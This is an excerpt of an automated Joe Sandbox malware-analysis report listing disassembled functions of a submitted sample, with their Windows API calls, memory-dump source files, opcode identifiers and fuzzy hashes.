                                                                                                • Part of subcall function 000FB07D: __EH_prolog.LIBCMT ref: 000FB082
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 29824e0f8565f889d6d322cf2cfaf2115a03b2ea9efdf4a6e5c2a4dde62d2110
                                                                                              • Instruction ID: 707e54a7fca7f69bf0f297841da53c261cd49491561824ab772fe42c57922651
                                                                                              • Opcode Fuzzy Hash: 29824e0f8565f889d6d322cf2cfaf2115a03b2ea9efdf4a6e5c2a4dde62d2110
                                                                                              • Instruction Fuzzy Hash: 3D4134B0805B44DEE724DF798485AE7FBE5FB28310F504A2ED2EE93282DB726554CB11
                                                                                              Function 000F1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F6057: __EH_prolog.LIBCMT ref: 000F605C
                                                                                                • Part of subcall function 000FC827: __EH_prolog.LIBCMT ref: 000FC82C
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC86F
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC893
                                                                                              • new.LIBCMT ref: 000F13FE
                                                                                                • Part of subcall function 000FB07D: __EH_prolog.LIBCMT ref: 000FB082
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 72d7e037a9c23a8bad5d96760e702ebe7bb90c58d5362c9704afcda3bd1e0ac1
                                                                                              • Instruction ID: 423ad3e282b0becc40f25667cd3afe7a71fbb9dca208c30946290af29734766c
                                                                                              • Opcode Fuzzy Hash: 72d7e037a9c23a8bad5d96760e702ebe7bb90c58d5362c9704afcda3bd1e0ac1
                                                                                              • Instruction Fuzzy Hash: CF4114B0805B44DEE724DF798485AE7FAE5FB28310F504A2ED2EE93282DB726554CB11
                                                                                              Function 0011B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00118FA5: GetLastError.KERNEL32(?,00130EE8,00113E14,00130EE8,?,?,00113713,00000050,?,00130EE8,00000200), ref: 00118FA9
                                                                                                • Part of subcall function 00118FA5: _free.LIBCMT ref: 00118FDC
                                                                                                • Part of subcall function 00118FA5: SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 0011901D
                                                                                                • Part of subcall function 00118FA5: _abort.LIBCMT ref: 00119023
                                                                                                • Part of subcall function 0011B2AE: _abort.LIBCMT ref: 0011B2E0
                                                                                                • Part of subcall function 0011B2AE: _free.LIBCMT ref: 0011B314
                                                                                                • Part of subcall function 0011AF1B: GetOEMCP.KERNEL32(00000000,?,?,0011B1A5,?), ref: 0011AF46
                                                                                              • _free.LIBCMT ref: 0011B200
                                                                                              • _free.LIBCMT ref: 0011B236
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 00a9ad864d425c8710d01178911251e676605b6a192b09fe40d121ecbb50b061
                                                                                              • Instruction ID: c4536c567f2a841be8720a684f214cae960a20216d26a484f25244c6fab7c815
                                                                                              • Opcode Fuzzy Hash: 00a9ad864d425c8710d01178911251e676605b6a192b09fe40d121ecbb50b061
                                                                                              • Instruction Fuzzy Hash: AB310431908208AFDB18EFA9D881BEDB7E1EF65320F2140B9E4149B291DB319DC5CB41
                                                                                              Function 000F971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000F9EDC,?,?,000F7867), ref: 000F97A6
                                                                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000F9EDC,?,?,000F7867), ref: 000F97DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 524a833e178fee58b1bc44a41e0cc7db45cfa2e8c0199ffbb7b915af64f851b6
                                                                                              • Instruction ID: 4d78615b1bb1ebc7fad39a6077748249a05c3e5f9b0c91c6699d960ea3e410f5
                                                                                              • Opcode Fuzzy Hash: 524a833e178fee58b1bc44a41e0cc7db45cfa2e8c0199ffbb7b915af64f851b6
                                                                                              • Instruction Fuzzy Hash: F321287010474CAFE7309F14C885BB777E8EB49764F00491DF2E5825D1C374AC85AB60
                                                                                              Function 000F9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000F7547,?,?,?,?), ref: 000F9D7C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 000F9E2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: 3fdc11982519dea684e31afcfd69b5d48827ef96cb3fc7df7be24fe6e4f41aaf
                                                                                              • Instruction ID: 32f9a5326595bb87e157c435f67c03a77a7693b90c71cf3b5ec29202528a7d40
                                                                                              • Opcode Fuzzy Hash: 3fdc11982519dea684e31afcfd69b5d48827ef96cb3fc7df7be24fe6e4f41aaf
                                                                                              • Instruction Fuzzy Hash: 7221D63114824AABC755DE24C451BBBBBE4AF95704F14081DB5D187951D329DA0CEB61
                                                                                              Function 0011A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0011A4B8
                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0011A4C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                              • String ID:
                                                                                              • API String ID: 2279764990-0
                                                                                              • Opcode ID: 9c149ef4e8d1ad95dcc671c9deabdc98e3dc32638f15afa7a6d268eed20f7ff0
                                                                                              • Instruction ID: 78859ec21da3fb2b27eb98e84343ac2ea6ba8fad2fbcc354dec70a2b606a70b7
                                                                                              • Opcode Fuzzy Hash: 9c149ef4e8d1ad95dcc671c9deabdc98e3dc32638f15afa7a6d268eed20f7ff0
                                                                                              • Instruction Fuzzy Hash: E911E7336021209F9B3A9E28EC448EA77959F8432075A4130FD15ABA44EB74DCC1CAD2
                                                                                              Function 000F9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,000F9B35,?,?,00000000,?,?,000F8D9C,?), ref: 000F9BC0
                                                                                              • GetLastError.KERNEL32 ref: 000F9BCD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: bedc8895306fe135cb36e560342b1a41df4761a201864b7fd1d985d0c7fd988f
                                                                                              • Instruction ID: e49556655dcde8085a314d8576a66d32ba43b8a4cabb6f0aa09f873386add6b3
                                                                                              • Opcode Fuzzy Hash: bedc8895306fe135cb36e560342b1a41df4761a201864b7fd1d985d0c7fd988f
                                                                                              • Instruction Fuzzy Hash: E201083130420D9F8B18CE65AE94A7EB399AFC0321B10452EFF2283A81CB35D805BA21
                                                                                              Function 000F9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 000F9E76
                                                                                              • GetLastError.KERNEL32 ref: 000F9E82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 06955a6f2a11b46a250f3dbdf4601b7d4b1b278b4498772500d25bac332ab1a1
                                                                                              • Instruction ID: 6204df634eea15421aa0f30d744f180ca7ba59ab7c217d56555da252969d5a02
                                                                                              • Opcode Fuzzy Hash: 06955a6f2a11b46a250f3dbdf4601b7d4b1b278b4498772500d25bac332ab1a1
                                                                                              • Instruction Fuzzy Hash: BB01B1713042086BEB34DE69DC44B7BB7D99B89314F14493EB256C3A80DB39EC4C9610
                                                                                              Function 00118606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00118627
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00130F50,000FCE57,?,?,?,?,?,?), ref: 00118663
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: 30df00d6dab96ac87305dee591bec91d8ddc688c2533538418a41bd867f61721
                                                                                              • Instruction ID: ca468ca187bf9606de29baefc2ff08042ffd98e18da25293808e70709809904e
                                                                                              • Opcode Fuzzy Hash: 30df00d6dab96ac87305dee591bec91d8ddc688c2533538418a41bd867f61721
                                                                                              • Instruction Fuzzy Hash: 14F06231205115BADB2D2A25AC00BEF776A9FE27A0F25C235F86896591DF20C8C1D5A5
                                                                                              Function 00100908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00100915
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 0010091C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 04e3ac533340c54bb4f9ebfb4e189f8d15bc8421b11e7044b89ebec04924f7b5
                                                                                              • Instruction ID: 0584a25237ad0f1b210e19c480571bfc2786664a5526f64e3fe76df24afa5e6e
                                                                                              • Opcode Fuzzy Hash: 04e3ac533340c54bb4f9ebfb4e189f8d15bc8421b11e7044b89ebec04924f7b5
                                                                                              • Instruction Fuzzy Hash: 26E09B32A10105BBEF1ACAA49C04ABB739DDB0C218B114179B85ED3541FB74DD018674
                                                                                              Function 000FA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA458
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA489
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 6506173a77f5a2d9a7a866c1ed5597867f40efd936a427b6467a0d9d103d37f0
                                                                                              • Instruction ID: 34b5310b021f8c745d1e0fb19f16236524a8a88ef6566c29f47a25722e070f30
                                                                                              • Opcode Fuzzy Hash: 6506173a77f5a2d9a7a866c1ed5597867f40efd936a427b6467a0d9d103d37f0
                                                                                              • Instruction Fuzzy Hash: 7FF0A03124020D7BDF115F60DC05FEA37ACBB08381F048051BD8C865A1DB769AA9EE64
                                                                                              Function 0010D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3011073432-0
                                                                                              • Opcode ID: 8f5211d8a9c2711ad81275b4ce0ea7ae8b5f3b7ca2fc11fe0ec24c505f9e6009
                                                                                              • Instruction ID: 9eeb240ed853cc11109df82adb044a2628d9b177e1bd5ecf525c1db35083650d
                                                                                              • Opcode Fuzzy Hash: 8f5211d8a9c2711ad81275b4ce0ea7ae8b5f3b7ca2fc11fe0ec24c505f9e6009
                                                                                              • Instruction Fuzzy Hash: E2F0EC7250034C7AEB11ABB09C07FAE3B6DAB04745F040555BB40678E2DBB16A505761
                                                                                              Function 000FA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,000F984C,?,?,000F9688,?,?,?,?,00121FA1,000000FF), ref: 000FA13E
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,000F984C,?,?,000F9688,?,?,?,?,00121FA1,000000FF), ref: 000FA16C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: c284c8e868d8e8ba4d0a3cc0a8eb04d59d4d145fdd93249c6811a7c0c3a4846d
                                                                                              • Instruction ID: 203cc1d6b9aa31c333e57f6db9249a2922a707965d8f5adcef546e6834eb7664
                                                                                              • Opcode Fuzzy Hash: c284c8e868d8e8ba4d0a3cc0a8eb04d59d4d145fdd93249c6811a7c0c3a4846d
                                                                                              • Instruction Fuzzy Hash: 34E0927564020C7BDB119F60DC41FF977ACBB09381F484065BD88C7461DB619DE9AEA4
                                                                                              Function 0010A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00121FA1,000000FF), ref: 0010A3D1
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00121FA1,000000FF), ref: 0010A3D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 35d688a42119775fdd6629c19f291883e764b9c5c6bed66f31105822def33d65
                                                                                              • Instruction ID: 3d89cc93cbbcc2edd3844de3ed3290002a40c06d5f0a173de7d78ab5006efa81
                                                                                              • Opcode Fuzzy Hash: 35d688a42119775fdd6629c19f291883e764b9c5c6bed66f31105822def33d65
                                                                                              • Instruction Fuzzy Hash: 9EF06572518654EFC710DB5DDD45B19FBACFB49B20F04436AF41983B60CB746811CA91
                                                                                              Function 000FA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000FA189,?,000F76B2,?,?,?,?), ref: 000FA1A5
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,000FA189,?,000F76B2,?,?,?,?), ref: 000FA1D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 6e58d72745b45804ca889d35c4216878be907637c61d79cfee10754ca540a950
